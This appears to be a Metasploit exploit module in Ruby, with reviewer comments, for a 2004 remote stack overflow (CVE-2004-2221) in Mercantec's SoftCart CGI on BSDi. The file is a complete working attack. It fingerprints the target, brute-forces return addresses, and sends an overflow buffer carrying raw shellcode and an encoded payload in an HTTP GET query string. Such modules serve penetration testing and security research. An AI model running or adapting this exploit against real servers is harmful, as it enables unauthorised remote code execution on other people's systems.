Path: blob/master/modules/exploits/bsdi/softcart/mercantec_softcart.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Remote stack overflow in Mercantec's SoftCart.exe CGI (CVE-2004-2221).
#
# The return address is not known up front, so the Brute mixin drives
# brute_exploit over the 'Ret' range declared in the target. Every attempt
# is a single HTTP GET whose query string carries the overflow, the
# candidate return address and the encoded payload. Because a CGI is a
# fresh process per request, a wrong guess only kills that one process
# (hence CRASH_SERVICE_RESTARTS), but each request line — payload bytes
# included — ends up in the web server's access log (IOC_IN_LOGS).
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Brute
  include Msf::Exploit::Remote::HttpClient

  # Module metadata plus the one user-settable option, URI.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Mercantec SoftCart CGI Overflow',
        'Description' => %q{
          This is an exploit for an undisclosed buffer overflow
          in the SoftCart.exe CGI as shipped with Mercantec's shopping
          cart software. It is possible to execute arbitrary code
          by passing a malformed CGI parameter in an HTTP GET
          request. This issue is known to affect SoftCart version
          4.00b.
        },
        'Author' => [ 'skape', 'trew' ],
        'References' => [
          [ 'CVE', '2004-2221'],
          [ 'OSVDB', '9011'],
          [ 'BID', '10926'],
        ],
        'Privileged' => false,
        'Payload' => {
          'Space' => 1000,
          # Bytes the encoder must avoid: whitespace, shell metacharacters,
          # quoting/redirection characters, URL-significant bytes and NUL.
          # The buffer travels as a raw query string, so anything that would
          # terminate or re-tokenise it has to stay out of the payload.
          'BadChars' => "\x09\x0a\x0b\x0c\x0d\x20\x27\x5c\x3c\x3e\x3b\x22\x60\x7e\x24\x5e\x2a\x26\x7c\x7b\x7d\x28\x29\x3f\x5d\x5b\x00",
          'MinNops' => 16,
          # Fixed stub executed before the payload proper. Decoding the
          # bytes by hand it reads like fork() through the BSD `lcall 7,0`
          # syscall gate, with one side exiting and the other falling
          # through to the payload — NOTE(review): confirm against a BSDi
          # disassembly before relying on that reading.
          'Prepend' => "\x6a\x02\x58\x50\x9a\x00\x00\x00\x00\x07\x00\x85\xd2\x75\x0a\x31\xc0\x40\x9a\x00\x00\x00\x00\x07\x00",
          # Runs ahead of the encoder's decoder stub; appears to be
          # `sub esp, 0x7f`, presumably so the decoder does not overwrite
          # itself on the stack — confirm.
          'PrependEncoder' => "\x83\xec\x7f"
        },
        'Platform' => 'bsdi',
        'Targets' => [
          [
            'BSDi/4.3 Bruteforce',
            {
              # Return-address window swept by Msf::Exploit::Brute.
              # 'Step' => 0 presumably lets the mixin derive the stride
              # itself (e.g. from the NOP sled) — verify in the mixin.
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0xefbf3000 },
                'Stop' => { 'Ret' => 0xefbffffc },
                'Step' => 0
              }
            },
          ],
        ],
        'DisclosureDate' => '2004-08-19',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SERVICE_RESTARTS],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        OptString.new('URI', [ false, 'The target CGI URI', '/cgi-bin/SoftCart.exe' ])
      ]
    )
  end

  # One brute-force attempt, invoked by the Brute mixin once per candidate
  # address.
  #
  # The target is fingerprinted on the first call only; the result is
  # memoised in @mercantec so later iterations go straight to the send.
  # The overflow buffer is: fixed CGI prefix, 512 bytes of filler, the
  # candidate return address, a 'MSF!' marker, a second pointer that is
  # the candidate address plus the payload length, then the payload.
  #
  # @param address [Hash] the mixin's current guess; only 'Ret' is used
  def brute_exploit(address)
    confirm_mercantec_target unless @mercantec

    ret = address['Ret']
    encoded = payload.encoded

    # Both pointers are packed little-endian 32-bit ('V') for x86 BSDi.
    buffer = [
      'MAA+scstoreB',
      rand_text_alphanumeric(512),
      [ret].pack('V'),
      'MSF!',
      [ret + encoded.length].pack('V'),
      encoded
    ].join

    print_status("Trying #{format('%.8x', ret)}...")

    # The whole overflow, raw payload bytes included, is sent as the query
    # string of a GET — this is what lands in the target's access log.
    send_request_raw({
      'uri' => normalize_uri(datastore['URI']),
      'query' => buffer
    }, 5)

    handler
  end

  private

  # Fetches the CGI once and records in @mercantec whether the body looks
  # like a Mercantec product; aborts the run via fail_with otherwise.
  #
  # This is a weak fingerprint: it only requires "Copyright" and
  # "Mercantec" to appear on the same line somewhere in the response
  # body (`.` does not cross newlines here), so an unrelated page that
  # happens to mention both would pass, and a banner that splits them
  # across lines would not. A nil response (timeout, connection failure)
  # is treated the same as a non-matching body.
  def confirm_mercantec_target
    res = send_request_raw({ 'uri' => normalize_uri(datastore['URI']) }, 5)
    @mercantec = res&.body&.match?(/Copyright.*Mercantec/)
    fail_with(Failure::NotFound, 'The target is not a Mercantec CGI') unless @mercantec
  end
end